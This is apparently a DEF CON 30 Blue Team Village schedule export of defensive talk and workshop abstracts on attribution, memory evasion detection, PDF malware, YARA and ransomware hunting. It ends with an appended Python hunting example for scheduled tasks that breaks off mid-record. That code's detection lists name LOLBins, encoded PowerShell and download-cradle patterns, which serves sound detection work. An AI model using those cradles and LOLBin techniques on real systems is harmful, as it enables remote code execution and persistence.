0.12
Blue Team Village (Hybrid) at DEF CON 30
call-for-content-2022
2022-08-11
2022-08-14
4
00:05
https://cfc.blueteamvillage.org
https://cfc.blueteamvillage.org/media/call-for-content-2022/img/BTVillage_logo_Nqvd7Zz.png
US/Pacific
Talks (Virtual)
Attribution and Bias: My terrible mistakes in threat intelligence attribution
Mini Talk (virtual, prerecorded)
2022-08-12T11:00:00-07:00
11:00
00:30
The threat intelligence industry suffers from a flow of inaccurate information, caused by irresponsible announcements and the differing perceptions of each vendor. In this presentation, I would like to share how quickly we can arrive at the wrong conclusions and what attitude we need in order to prevent these failures.
call-for-content-2022-183-attribution-and-bias-my-terrible-mistakes-in-threat-intelligence-attribution
en
One of the most important aspects of threat intelligence is the attribution of threat actors—identifying the entity behind an attack, their motivations, or the ultimate sponsor of the attack. Attribution is one of the most complicated aspects of cybersecurity, and it is easy to make mistakes because the underlying architecture of the internet offers numerous ways for attackers to hide their tracks. Threat actors can use false flags to deceive the security community about their identity, and natural human bias can lead researchers in the wrong direction. In this presentation, I will discuss three of the biggest lessons I’ve learned with regards to attribution—and how researchers can avoid making the same errors.
The first mistake is related to perception bias. The Olympic Destroyer was a cyber-sabotage attack that happened during the PyeongChang Winter Olympics in 2018. Many security vendors published information about the substance of the attack alongside unclear speculation about who was ultimately behind it. During the early stage of my Olympic Destroyer research, I strongly believed a North Korea-linked threat actor was behind the attack. Looking back, I’m overwhelmed by my confirmation bias at that time. The relationship between North Korea and South Korea was relatively stable during the Olympics, but North Korea sometimes attacked South Korea regardless. Therefore, I assumed the attack was associated with a North Korean threat actor that wanted to sow chaos during the Olympic season. However, my colleague discovered a fascinating rich header false flag designed to disguise the fact that this attack was carried out by an unrelated threat actor. Also, after an in-depth, onsite investigation, I confirmed that the threat actor behind this attack utilized a totally different modus operandi than the presumed North Korean threat actor. I had allowed my perception bias to hinder my attribution efforts.
The second mistake occurred as a result of an over-reliance on third-party functions.
Researchers are often inclined to rely on too many third-party tools, and occasionally this blind faith causes mistakes. One day, I discovered that one Korean-speaking threat actor utilized a 0-day exploit embedded in a Word document. Based on the metadata of the malicious document, I used VirusTotal to find additional documents with similar metadata. All of them had the same language code page, which made me even more biased. From then on, I started going in the wrong direction. I totally believed that those documents were created by the same threat actor. However, I later discovered that the documents were created by two different actors with very similar characteristics. Both of them are Korean-speaking actors who, historically, attack the same target. Eventually, I uncovered the difference between the two and was able to reach the right conclusion—but this required going beyond what my tools told me was the correct answer.
The last mistake occurred as a result of impatience. When I investigated one cryptocurrency exchange incident, I noticed that the cryptocurrency trading application was compromised and had been delivered with a malicious file. Without any doubt, I concluded that the supply chain of this company was compromised, and contacted them via email to notify them of this incident. But, as soon as I contacted them, their websites went offline and the application disappeared from the website. After a closer examination of their infrastructure, I recognized that everything was fake, including the company website, application, and 24/7 support team. Later, we named this attack Operation AppleJeus, which US-CERT also mentioned when three North Korean hackers were indicted. In my haste to conclude my research, I failed to notice an operational aspect of the operation.
Threat intelligence is a high-profile industry with numerous stories that have major geopolitical ramifications. Not only is attribution one of the hardest aspects of this field—it’s the one that carries the most significant consequences if not done correctly. Unfortunately, human intuition and bias interfere with proper attribution, leading to mistakes. By sharing my own struggles with attribution, it is my hope that other researchers in the security community can carry out their own investigations with greater accuracy.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/X9YX3P/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/X9YX3P/feedback/
Talks (Virtual)
Malicious memory techniques on Windows and how to spot them
Talk (virtual, prerecorded)
2022-08-12T11:45:00-07:00
11:45
01:00
Malicious actors are always trying to find new ways to avoid detection by ever more vigilant EDR systems and deploy their payloads. Over the years, the scope of techniques used has branched from relatively simplistic hash comparison and sandbox avoidance to low-level log dodging and even direct circumvention of EDR telemetry acquisition. By examining some of the techniques used on Windows systems, this talk will highlight the range of capabilities defensive operators are dealing with, how some can be detected and, in rare cases, the performance and false-positive obstacles in designing detection capability.
call-for-content-2022-164-malicious-memory-techniques-on-windows-and-how-to-spot-them
en
My presentation will cover malicious memory techniques, focusing on the Windows operating system. These will span from relatively simple in-line hooking techniques used to jump to malicious code or circumvent legitimate code execution, all the way to manipulation of exception handling mechanisms. The talk will also cover problematic situations which occur when designing detection mechanisms for such activities in the real world, where cost-balancing is required for resource management.
I will explain in-line hooking, kernel patching (InfinityHook, Ghost_in_the_logs), Heaven's Gate hooking and Vectored Exception Handler (VEH) manipulation techniques (FireWalker), and how they can be detected. In-line hooking and Heaven's Gate hooking involve manipulating the loaded memory of a module within a specific process's memory space. Kernel patching involves injecting a hook into kernel memory space in order to provide a low-level, high-priority bypass technique for malicious programs to circumvent ETW log publication via vulnerable kernel driver installation. VEH manipulation is the use of the high-priority frameless exception mechanism in order to circumvent memory integrity checks, manipulate flow control and even run malicious shellcode. Detection for all these techniques will involve advancing from the explanation of their execution to the telemetry sources that can be leveraged for detection purposes. In all cases this involves the examination of volatile memory; however, as each technique targets a different native functionality, the mechanisms required to analyze the memory differ greatly. The deviations can be relatively simple, but in some cases an understanding of undocumented mechanisms and structures is required to effect detection capability.
Examination of un-tabled module function modifications will also provide insight into some of the difficulties involved in this detection development work. This section will provide the audience with a low-level technical understanding of how these techniques are targeted, developed and used by malicious actors, and some possible solutions for detection, with an explanation of the inherent caveats in such solutions (primarily around resource availability or accuracy trade-offs).
A full explanation of the devised detection methodology and collectable telemetry will be provided for each malicious technique. This will cover the overall detection capabilities as well as exploring the low-level mechanisms used to collect this data from the monitored system, such as opcode heuristics and memory location attribution crossing CPU mode boundaries. It will also cover issues encountered with collection, typically related to OS architecture choices, and how these can also be circumvented to enable effective monitoring.
Audience members should leave my presentation having a firm grasp on the fundamentals of all the techniques outlined and why attackers may choose to employ them in different scenarios. Along with a functional understanding of the malicious technique, the audience members will also be supplied with a working understanding of detection options for these techniques and clear examples of how monitoring can be deployed and integrated into their solutions.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XBMJCJ/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XBMJCJ/feedback/
Talks (Virtual)
Improving security posture of MacOS and Linux with Azure AD
Talk (virtual, prerecorded)
2022-08-12T13:00:00-07:00
13:00
01:00
Most organizations have Windows, MacOS and Linux in their environment. Typically, many of the security controls that are applied to Windows are not applied to MacOS or Linux, due to the size of the footprint and the difficulty of implementation. This can lead to holes in an organization's overall security posture as well as a poor end user experience.
Recently, Azure AD has released some new functionality to help improve the overall environment security posture for MacOS and Linux, both servers and clients. We'll discuss how these pieces work deep down and some best practices on deploying them.
call-for-content-2022-155-improving-security-posture-of-macos-and-linux-with-azure-ad
en
We are from the Microsoft identity product group responsible for Active Directory and Azure Active Directory. We’ve noticed many customers struggle to deliver a good end user experience on their Apple and Linux platforms. There are various ways to do this, but many customers are simply unaware of recommended configurations and best practices. This will be a deeply technical session that focuses not only on what can be done to improve this experience, but on how the underlying Microsoft, Linux, and Apple technologies can work better together.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/SZVDZ8/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/SZVDZ8/feedback/
Talks (Virtual)
Lend me your IR's!
Talk (virtual, prerecorded)
2022-08-12T14:15:00-07:00
14:15
01:00
Protecting systems and networks as a tech defender means withstanding a constant barrage of unsophisticated attacks from automated tools, botnets, crawlers, exploit kits, phish kits, and script kiddies; oh my! Occasionally, we encounter attacks worthy of style points for creativity or new twists on old attack techniques. This talk features demoed reenactments from some advanced attacks investigated by the presenter. The demos showcase technical deep dives of the underpinnings from both the attacker and investigator sides of these attacks. Attendee key takeaways are strategies, freely available tools, and techniques helpful during incident response investigations.
call-for-content-2022-159-lend-me-your-ir-s-
/media/call-for-content-2022/submissions/XQMWWB/lmyirs_G6mrXl2.png
en
This is a fun technical talk covering three of my favorite security investigations as an Incident Response professional. The presentation features demoed reenactments of actual real-world attacks. I showcase both the attacker side as well as the investigation side of these security incidents. I show and talk through example source code and explain how each of the attacks work. I then flip these scenarios around by explaining how to use numerous free and open-source tools to investigate those same security incidents. Each scenario is closed by covering the follow-up remediation steps.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XQMWWB/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/XQMWWB/feedback/
Talks (Virtual)
Malware Hunting - Discovering techniques in PDF malicious
Talk (virtual, prerecorded)
2022-08-12T15:30:00-07:00
15:30
01:00
A demonstration of the different structures found in a PDF binary (header, body, cross-reference table, trailer), explaining how each section works within the binary and what techniques are used, such as packers, obfuscation with JavaScript in PDFs, and more.
call-for-content-2022-165-malware-hunting-discovering-techniques-in-pdf-malicious
/media/call-for-content-2022/submissions/PVCLSY/Filipi_Pires_-_Talks_9K3S99A.jpeg
en
We'll walk through the structures of a PDF, analyzing each part of it and demonstrating how threat actors include malicious components in the structures of the file, in addition to demonstrating the collection of IOCs (Indicators of Compromise) and how to build IOAs (Indicators of Attack) for behavior-based analysis, to anticipate new attacks. We will demonstrate the structures of a PDF binary (header, body, cross-reference table, trailer) and perform a comparison of malicious PDFs, explaining how each section works within the binary and what techniques are used, such as packers, obfuscation with JavaScript in PDFs, and more, also explaining some anti-disassembly techniques, demonstrating how this malware acts and where it would be possible to “include” malicious code.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PVCLSY/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PVCLSY/feedback/
Talks (Virtual)
YARA Rules to Rule them All
Lightning Talk (virtual, prerecorded)
2022-08-12T16:45:00-07:00
16:45
00:15
Malware developers work just like legitimate software developers, aiming to reduce the time wasted on repetitive tasks wherever possible. That means they create and reuse code across their malware. This has a pay-off for malware hunters and threat intelligence researchers: we can learn how to create search rules to detect this kind of code reuse. Traditional YARA rules are written on strings, but if we implement rules that leverage YARA code reuse detection in addition to the strings rule, the rule will last decades.
call-for-content-2022-161-yara-rules-to-rule-them-all
en
Whenever we want to proactively hunt for malware of interest for threat intelligence purposes, YARA is the Swiss Army knife that makes the work of malware researchers and threat intelligence researchers easier.
We will talk about leveraging YARA to detect future versions of the malware.
Malware developers work just like legitimate software developers, aiming to reduce the time wasted on repetitive tasks wherever possible. That means they create and reuse code across their malware. This has a pay-off for malware hunters and threat intelligence researchers: we can learn how to create search rules to detect this kind of code reuse. Traditional YARA rules are written on strings, but if we implement rules that leverage YARA code reuse detection in addition to the strings rule, the rule will last decades. We can leverage that for finding future malware from the same authors using their digital code fingerprints.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/WU7CZU/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/WU7CZU/feedback/
Workshops (Virtual)
Practical Dark Web Hunting using Automated Scripts
Workshop (virtual, live)
2022-08-12T11:00:00-07:00
11:00
01:30
How can you effectively hunt data from the dark web using scripts? How can you circumvent scraping defenses on the dark web? If you are curious about the answers to these questions and want to learn how to effectively write automated scripts for this task, then this workshop is for you. In this workshop, you will learn why collecting data from the dark web is essential, how you can create your own tools & scripts, and how to automate your scripts for effective collection. The workshop's primary focus will be on circumventing defenses put in place by forums on the dark web against scraping.
call-for-content-2022-157-practical-dark-web-hunting-using-automated-scripts
en
The workshop will start by taking everyone through why we should focus on the dark web for research and why it is important to collect data from the dark web. We will explore the importance of data collection with some examples. The second part of the workshop will cover some dark web OSINT tools that one can use to start with dark web data collection/hunting. Attendees will learn how these tools work and what different categories of dark web OSINT tools one can utilize in their research. The third part of the workshop will cover tools and libraries to create your own dark web hunting platform. We will explore writing code and automating dark web data collection. This part includes a live lab demo and code explanation. The workshop will end with a few tips on OpSec practices and resources to start with dark web hunting.
Takeaways from the workshop:
1. Understanding why dark web research is important
2. A collection of dark web OSINT tools to start your research
3. A basic understanding of automated dark web data hunting
4. A Python codebase to start with your dark web data collection
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/MZLTQC/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/MZLTQC/feedback/
Workshops (Virtual)
Ransomware ATT&CK and Defense
Workshop (virtual, live)
2022-08-12T13:00:00-07:00
13:00
01:30
This hands-on training workshop will walk attendees through hunting for Tactics, Techniques, and Procedures (TTPs) frequently used by ransomware adversaries. From Reconnaissance and Initial Access to Exfiltration and Impact, attendees will be exposed to a compressed ransomware attack lifecycle. Workshop TTPs will be mapped to the MITRE ATT&CK Framework, and the workshop will incorporate offensive operation elements such as adversary emulation, while emphasizing purple and blue teaming. We will explore the endpoint and network logs left behind by attack TTPs and how the blue team can utilize such logs and defensive tooling to detect and disrupt the attack.
call-for-content-2022-182-ransomware-att-ck-and-defense
/media/call-for-content-2022/submissions/GBGNZQ/threathunter_400x400_dmTKcOe_IgEAN8j.jpg
en
This hands-on training workshop will walk attendees through threat hunting exercises to detect and investigate common Tactics, Techniques, and Procedures (TTPs) frequently used by ransomware threat actors during an attack. From Reconnaissance and Initial Access to Exfiltration and Impact, attendees will be exposed to a compressed ransomware attack lifecycle while being able to leverage attack TTPs including commands, scripts, tools, communication channels, and techniques that we frequently see and use in the wild. Tactics and techniques will be mapped to the MITRE ATT&CK Framework, and will be inspired by ATT&CK's Adversary Emulation Plans. The workshop will accordingly incorporate offensive operation elements such as adversary emulation and red teaming, but with an emphasis on purple teaming and blue teaming. In other words, we will explore the logs and other artifacts potentially left behind by our attack TTPs and how the blue team might utilize endpoint and network logs and defensive tooling to detect and disrupt the ATT&CK kill chain components. Examples of tools and threat intelligence sources that will be incorporated include Atomic Red Team, open-source offensive security tools such as Mimikatz, Living off the Land Binaries and Scripts (LOLBAS) including PowerShell, real-world or proof-of-concept malware samples and exploits, and leaked ransomware playbooks supplemented by other open-source intelligence (OSINT) sources; and specifically on the blue team side, popular security logging pipeline and Security Information and Event Management (SIEM) tools such as Sysmon and Elastic Stack.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/GBGNZQ/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/GBGNZQ/feedback/
Main Stage (In-person)
Blue Team Village Opening Ceremony
Village Ceremony (in-person)
2022-08-12T10:00:00-07:00
10:00
00:30
Blue Team Village Opening Ceremony
call-for-content-2022-222-blue-team-village-opening-ceremony
en
Blue Team Village Opening Ceremony
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/LRQVHC/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/LRQVHC/feedback/
Main Stage (In-person)
Obsidian Live: Eating the Elephant 1 byte at a Time
Project Obsidian (in-person)
2022-08-12T10:30:00-07:00
10:30
01:00
Incident Response: This is a live walkthrough of a real world incident focused on the first half of incident response. We will be breaking down scoping, triage, and communication aspects of incident handling into digestible and actionable recommendations.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-201-obsidian-live-eating-the-elephant-1-byte-at-a-time
en
Incident Response: This is a live walkthrough of a real world incident focused on the first half of incident response. We will be breaking down scoping, triage, and communication aspects of incident handling into digestible and actionable recommendations.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/U9GVJV/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/U9GVJV/feedback/
Main Stage (In-person)
Obsidian Forensics: KillChain1 - Adventures in Splunk and Security Onion
Project Obsidian (in-person)
2022-08-12T13:00:00-07:00
13:00
01:00
A live forensics walkthrough of the Obsidian Kill Chain 1 (KC1) forensic analysis using Splunk and Security Onion.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-204-obsidian-forensics-killchain1-adventures-in-splunk-and-security-onion
en
A live forensics walkthrough of the Obsidian Kill Chain 1 (KC1) forensic analysis using Splunk and Security Onion.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/DVVT8R/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/DVVT8R/feedback/
Main Stage (In-person)
Obsidian CTH Live: Killchain 1 - Go Phish!
Project Obsidian (in-person)
2022-08-12T14:00:00-07:00
14:00
01:00
Come take a dive into the data lake and cast some queries to find proof that users have run files from malicious actors. How can we prove the existence of troublesome activity in the environment?
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-214-obsidian-cth-live-killchain-1-go-phish-
en
Come take a dive into the data lake and cast some queries to find proof that users have run files from malicious actors. How can we prove the existence of troublesome activity in the environment? We will take a journey as if we are a new member of the Magnum Tempus Financial Security Team and proceed through a Threat Hunt through the eyes of a newbie in the field of Threat Hunting.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/AGZJET/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/AGZJET/feedback/
Main Stage (In-person)
Heavyweights: Threat Hunting at Scale
Panel (in-person)
2022-08-12T15:00:00-07:00
15:00
01:00
A panel discussion on how evolving techniques for defenders are amplified, from some of the teams behind the blogs.
call-for-content-2022-192-heavyweights-threat-hunting-at-scale
en
A panel discussion on how evolving techniques for defenders are amplified, from some of the teams behind the blogs.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PKXKG3/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/PKXKG3/feedback/
Main Stage (In-person)
Take Your Security Skills From Good to Better to Best!
Panel (in-person)
2022-08-12T16:00:00-07:00
16:00
01:00
Why dwell in the lobby of the Security field when you could be enjoying the view from the penthouse? Get insight from our esteemed panel on how to stay up to date on hacker news, increase your technical skills, and be aware of opportunities for professional development. Our panel will also discuss the importance of sending that elevator back down to help others so that our entire industry can grow and thrive, just like you will. Open up your ears and your mind and enjoy the gems that will be dropped.
call-for-content-2022-194-take-your-security-skills-from-good-to-better-to-best-
en
Why dwell in the lobby of the Security field when you could be enjoying the view from the penthouse? Get insight from our esteemed panel on how to stay up to date on hacker news, increase your technical skills, and be aware of opportunities for professional development. Our panel will also discuss the importance of sending that elevator back down to help others so that our entire industry can grow and thrive, just like you will. Open up your ears and your mind and enjoy the gems that will be dropped.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ZQXSNG/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ZQXSNG/feedback/
Main Stage (In-person)
Blue Teaming Cloud: Security Engineering for Cloud Forensics & Incident Response
Panel (in-person)
2022-08-12T17:00:00-07:00
17:00
01:00
Whether you’re in AWS, Azure or GCP, cloud security engineering doesn’t stop at basic guardrails and sending logs to a SIEM. So how do you engineer for the challenges unique to cloud forensics and incident response? This panel of cloud security engineers and incident responders will share their experiences and insights to help you take your security engineering from “just the basics” to “prepared for the inevitable”.
call-for-content-2022-189-blue-teaming-cloud-security-engineering-for-cloud-forensics-incident-response
en
Whether you’re in AWS, Azure or GCP, cloud security engineering doesn’t stop at basic guardrails and sending logs to a SIEM. So how do you engineer for the challenges unique to cloud forensics and incident response? This panel of cloud security engineers and incident responders will share their experiences and insights to help you take your security engineering from “just the basics” to “prepared for the inevitable”.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/FKU39P/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/FKU39P/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian Forensics: Kill Chain 1 Endpoint Forensics Walkthrough
Project Obsidian (in-person)
2022-08-12T10:30:00-07:00
10:30
01:00
Obsidian Forensics Station: Kill Chain 1 Endpoint Forensics Walkthrough
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-206-obsidian-forensics-kill-chain-1-endpoint-forensics-walkthrough
en
Obsidian Forensics Station: In this pre-recorded presentation we will walk through the artifacts and analysis of the Obsidian Kill Chain 1 using forensic artifacts found on the affected endpoints.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/VPQKHY/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/VPQKHY/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian: IR - It all starts here, scoping the incident
Project Obsidian (in-person)
2022-08-12T11:30:00-07:00
11:30
01:00
You can't analyze what you don't know; learn to prepare yourself for any investigation, no matter the subject.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-215-obsidian-ir-it-all-starts-here-scoping-the-incident
en
Scoping and Triage
You can't analyze what you don't know; learn to prepare yourself for any investigation, no matter the subject.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/YMPLC7/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/YMPLC7/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian: IR - Mise En Place for Investigations
Project Obsidian (in-person)
2022-08-12T13:00:00-07:00
13:00
01:00
If you don't document it, it didn't happen. A real world approach to IR communication.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-200-obsidian-ir-mise-en-place-for-investigations
en
The Project Obsidian Incident Response station will walk through how to capture the necessary information as you are actively working an incident without slowing down on tickets, notes, timeline recording, and status updates. Plus tips based on years of IR experience on what NOT to do: spend less time writing and more time doing.
This session is based on the Kill Chain 1 data set and will show you how to prep and work an incident with a focus on communication and efficiency in all aspects.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/LQYWFS/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/LQYWFS/feedback/
Project Obsidian: Track 0x41 (In-person)
Obsidian Forensics: The Importance of Sysmon for Investigations
Project Obsidian (in-person)
2022-08-12T14:00:00-07:00
14:00
01:00
In this video we will discuss Sysmon -- what it is, how to get it, the configuration file, the events it logs, and why it's so valuable to forensic investigations.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-212-obsidian-forensics-the-importance-of-sysmon-for-investigations
en
Video presentation outlining the benefits of Sysmon for investigations.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/3T8SAB/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/3T8SAB/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian CTH: Go Phish: Visualizing Basic Malice
Project Obsidian (in-person)
2022-08-12T10:30:00-07:00
10:30
01:00
Come take a dive into the data lake and cast some queries to find proof that users have run files from malicious actors. How can we prove the existence of troublesome activity in the environment? We will take a journey as if we are a new member of the Magnum Tempus Financial Security Team and proceed through a Threat Hunt through the eyes of a newbie in the field of Threat Hunting.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience.
call-for-content-2022-223-obsidian-cth-go-phish-visualizing-basic-malice
en
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/NYVHUD/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/NYVHUD/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian CTI: Generating Threat Intelligence from an Incident
Project Obsidian (in-person)
2022-08-12T11:30:00-07:00
11:30
01:00
This session presents an overview of how threat intelligence can be generated from an incident and shared with various stakeholders. We'll run through an incident and demonstrate how the CTI team plays a critical role by performing research and providing insights based on stakeholder requirements.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
call-for-content-2022-199-obsidian-cti-generating-threat-intelligence-from-an-incident
en
This module covers:
- Direction & Planning: Overview of CTI stakeholders and intelligence requirements
- Collection: CTI analysts role during an incident
- Processing: Intrusion data & information
- Analysis & Production: Elements to include in a report
- Dissemination: Sharing the report with stakeholders
- Feedback & Evaluation: Methods for receiving feedback
The objective is to demonstrate the critical role CTI plays both during and after an incident.
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ZAHDHJ/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/ZAHDHJ/feedback/
Project Obsidian: Track 0x42 (In-person)
Obsidian CTH: Hunting for Adversary's Schedule
Project Obsidian (in-person)
2022-08-12T13:00:00-07:00
13:00
01:00
Once an adversary has gained a foothold, they typically want to keep their access and establish persistence. Scheduled tasks are one of the most commonly used persistence techniques in adversary intrusions, and for good reason. In this session we take a look at scheduled tasks. We start with the basics, then learn how to create a hypothesis to conduct a threat hunt. In the end, we'll take a stab at detection engineering concepts surrounding the creation/revision of detections/analytics from the telemetry we obtain from hunting this technique.
Project Obsidian is an immersive, defensive cybersecurity learning experience.
call-for-content-2022-225-obsidian-cth-hunting-for-adversary-s-schedule
en
Once an adversary has gained a foothold, they typically want to keep their access. Here, I'm using the term "access" loosely, where it could be many things like a C2 beacon, script, binary, security source providers, shortcuts, and so on. This is called Persistence, or in MITRE speak "TA0003" [3]. We take a look at one such persistence method, Scheduled Task. Scheduled tasks are one of the most commonly used persistence techniques in adversary intrusions, and for good reason. They can be created on local and remote machines, in several ways (from the GUI to the Win32 API), and can be combined with tactics like Execution and Privilege Escalation. We start with the basics of scheduled tasks, and why and when an adversary would like to use them. Then we jump into the hell of threat hunting to see some ways to create a hypothesis and investigate the result set. In the end, we take a stab at detection engineering concepts surrounding the creation/revision of detections/analytics from the queries/results we got from hunting this technique.
Blue Team Village’s Project Obsidian is an immersive, defensive cybersecurity learning experience that provides attendees with the opportunity to gain knowledge of Incident Response (IR), Digital Forensics (DF), Reverse Engineering Malware (REM), Cyber Threat Intelligence (CTI), and Cyber Threat Hunting (CTH).
false
https://dc30.blueteamvillage.org/call-for-content-2022/talk/AMXVTY/
https://dc30.blueteamvillage.org/call-for-content-2022/talk/AMXVTY/feedback/
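As an added example for the scheduled-task hunt described in the abstract above (editor-supplied illustration, not material from the talk or from Blue Team Village), the Python below scores constructed Security Event ID 4698 ("A scheduled task was created") records against a simple hypothesis: a task whose action launches an interpreter or LOLBin with encoded or download-cradle arguments, sits in the root task folder, runs as SYSTEM, or is marked Hidden deserves an analyst's attention. The sample records, the indicator lists and the threshold are assumptions for illustration and should be tuned against your own baseline.

```python
import re
import xml.etree.ElementTree as ET

# Interpreters and LOLBins that rarely belong in a legitimate task action (assumed list).
LOLBINS = {"powershell.exe", "pwsh.exe", "cmd.exe", "mshta.exe", "rundll32.exe",
           "regsvr32.exe", "wscript.exe", "cscript.exe", "certutil.exe", "bitsadmin.exe"}
# Argument patterns typical of encoded/hidden PowerShell and download cradles.
SUSPICIOUS_ARGS = re.compile(
    r"(-enc\w*\s|-e\s+[A-Za-z0-9+/=]{20,}|downloadstring|invoke-expression|\biex\b"
    r"|https?://|frombase64string|-w\w*\s+hidden)", re.I)

# Constructed sample records shaped like Security Event ID 4698. Not real telemetry; the
# TaskContent XML mirrors the Task Scheduler schema written into that event. The base64
# blob in the second record is an opaque placeholder, never decoded here.
SAMPLE_4698 = [
    {"SubjectUserName": "SYSTEM", "TaskName": r"\Microsoft\Windows\Defrag\ScheduledDefrag",
     "TaskContent": r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Actions><Exec><Command>%windir%\system32\defrag.exe</Command><Arguments>-c -h -o -$</Arguments></Exec></Actions>
</Task>"""},
    {"SubjectUserName": "jdoe", "TaskName": r"\Updater",
     "TaskContent": r"""<Task xmlns="http://schemas.microsoft.com/windows/2004/02/mit/task">
  <Principals><Principal><UserId>S-1-5-18</UserId><RunLevel>HighestAvailable</RunLevel></Principal></Principals>
  <Settings><Hidden>true</Hidden></Settings>
  <Actions><Exec><Command>powershell.exe</Command>
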